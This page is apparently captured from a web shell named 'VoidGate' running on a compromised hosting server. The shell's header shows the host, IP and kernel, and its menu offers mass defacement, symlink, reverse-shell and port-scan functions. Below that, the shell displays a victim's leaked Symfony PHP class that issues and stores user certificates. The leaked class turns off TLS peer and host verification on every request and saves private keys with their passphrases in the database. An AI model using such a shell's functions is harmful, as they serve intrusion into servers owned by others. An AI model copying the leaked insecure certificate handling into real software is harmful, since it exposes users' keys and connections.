ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Utils
/
PkiServer
/
Viewing: PkiNodeServer.php
<?php namespace AppBundle\Utils\PkiServer; use GuzzleHttp\Client; use JMS\Serializer\Serializer; use Symfony\Component\HttpFoundation\Response; use AppBundle\Utils\PkiServer\Model\DistinguishedName; use AppBundle\Utils\PkiServer\Model\Issuer; use AppBundle\Entity\SSLCert\CustomerCertData; use AppBundle\Entity\SSLCert\StaffCertData; use AppBundle\Entity\SSLCert\UserCertData; use AppBundle\Entity\Customer; use AppBundle\Entity\Staff; use Doctrine\ORM\EntityManager; class PkiNodeServer { const CUSTOMERS_ORGANIZATION = "Customers organization"; private $em; private $pkiServerClient; private $serializer; private $pki_username; private $pki_password; private $pki_client_cert_path; private $pki_client_key_path; private $default_key_numbits; private $root_ca_name; private $ca_name; public function __construct( EntityManager $em, Client $pkiServerClient, Serializer $serializer, $pki_username, $pki_password, $pki_client_cert_path, $pki_client_key_path, $default_key_numbits, $root_ca_name, $ca_name ) { $this->em = $em; $this->PkiServerClient = $pkiServerClient; $this->serializer = $serializer; $this->pki_username = $pki_username; $this->pki_password = $pki_password; $this->pki_client_cert_path= $pki_client_cert_path; $this->pki_client_key_path= $pki_client_key_path; $this->default_key_numbits = $default_key_numbits; $this->root_ca_name = $root_ca_name; $this->ca_name = $ca_name; } /** * Get Public/Private key pair (Authenticated User) * * @return string resultString */ public function createNewCert($password, $numbits, $distName, $issuer, $type="client", $lifeTime="") { $uri = "/api/v1/certificate/pair/"; $method = "POST"; $resp = $this->PkiServerClient->request($method, $uri,[ 'cert'=> $this->pki_client_cert_path, 'ssl_key' => [$this->pki_client_key_path, $this->pki_password ], 'curl' => [ CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false ], 'json' => [ 'password' => $password, 'numbits' => $numbits, 'info' => [ "C" => $distName->getC(), "ST" => $distName->getST(), "L" => $distName->getL(), "O" => $distName->getO(), "OU" => $distName->getOU(), "CN" => $distName->getCN(), "email" => $distName->getEmail() ], 'issuer' => [ "root"=> $issuer->getRoot(), "name" => $issuer->getName() ], 'type'=>$type ] ] ); return $resp->getBody()->getContents(); } /** * Verify a certificate with its issuer * * @param string $cert the certificate to check * @return boolean */ public function checkCert($cert) { $uri = '/api/v1/certificate/verify/'; $resp = $this->PkiServerClient->request('PUT',$uri,[ 'cert'=> $this->pki_client_cert_path, 'ssl_key' => [$this->pki_client_key_path, $this->pki_password ], 'curl' => [ CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false ], 'json' => [ 'cert' => $cert, 'issuer' => [ 'root' => $this->root_ca_name, 'name'=> $this->ca_name ] ] ] ); $json = json_decode($resp->getBody()->getContents(), true); return $json['result']['verified']; } /** * Get the details of a certificate * * @param string $cert the certificate to check * @return json */ public function getCertInfo($cert) { $uri = "/certificate/info/"; $method = "PUT"; $resp = $this->PkiServerClient->request($method,$uri,[ 'cert'=> $this->pki_client_cert_path, 'ssl_key' => [$this->pki_client_key_path, $this->pki_password ], 'curl' => [ CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false ], 'json' => [ 'cert' => $cert ] ] ); return $resp->getBody()->getContents(); } /** * Create a new private key and a signed certificate for a User (Customer or Staff) * * @param \AppBundle\Entity\BaseUser $user * @param string $passphrase * */ public function createUserCert($user, $passphrase) { $numbits = $this->default_key_numbits; $dn = new DistinguishedName(); $dn->setC("CM"); $dn->setST("CM"); $dn->setL($user->getAddress()->getTown()); if($user instanceof Staff){ $dn->setO($user->getCompany()->getName()); //set the organization only if the created user is a staff } else { $dn->setO(self::CUSTOMERS_ORGANIZATION); } $dn->setOU($user->getRoles()[0]); $dn->setCN($user->getUsername()); $dn->setEmail($user->getEmail()); $issuer = new Issuer(); $issuer->setRoot($this->root_ca_name); $issuer->setName($this->ca_name); return $this->createNewCert($passphrase, $numbits, $dn, $issuer); } /** * Save a certData of a User * * @return boolean true if successful */ public function saveUserCert($user, $privateKey, $cert, $passphrase) { $certData = new UserCertData(); $certData->setUserId($user->getId()); $certData->setPrivateKey($privateKey); $certData->setCert($cert); $certData->setPassphrase($passphrase); $this->em->persist($certData); $this->em->flush(); return true; } /** * Load the CertData of a user from database * * @return \AppBundle\Entity\SSLCert\UserCertData */ public function loadUserCertData($user) { $certData = $this ->em ->getRepository('AppBundle:SSLCert\\UserCertData') ->findOneByUserId($user->getId()); return $certData; } /** * Create a private Key and a certificate for a user and save it in the database * @param \AppBundle\Entity\User $user * @param string $passphrase * * @return boolean True is resturned if the opération is done well. */ public function createAndSaveUserCert( $user, $passphrase) { $resString = $this->createUserCert($user, $passphrase); $resArray = json_decode($resString, true); $key = $resArray['result']['key']; $cert = $resArray['result']['cert']; $success = $this->SaveUserCert($user,$key,$cert,$passphrase); return $success; } /** * Get The public and/or the private key of the server */ public function getServerKey($returnPrivate) { //TODO return the keys of the server } }
Coded With 💗 by
0x6ick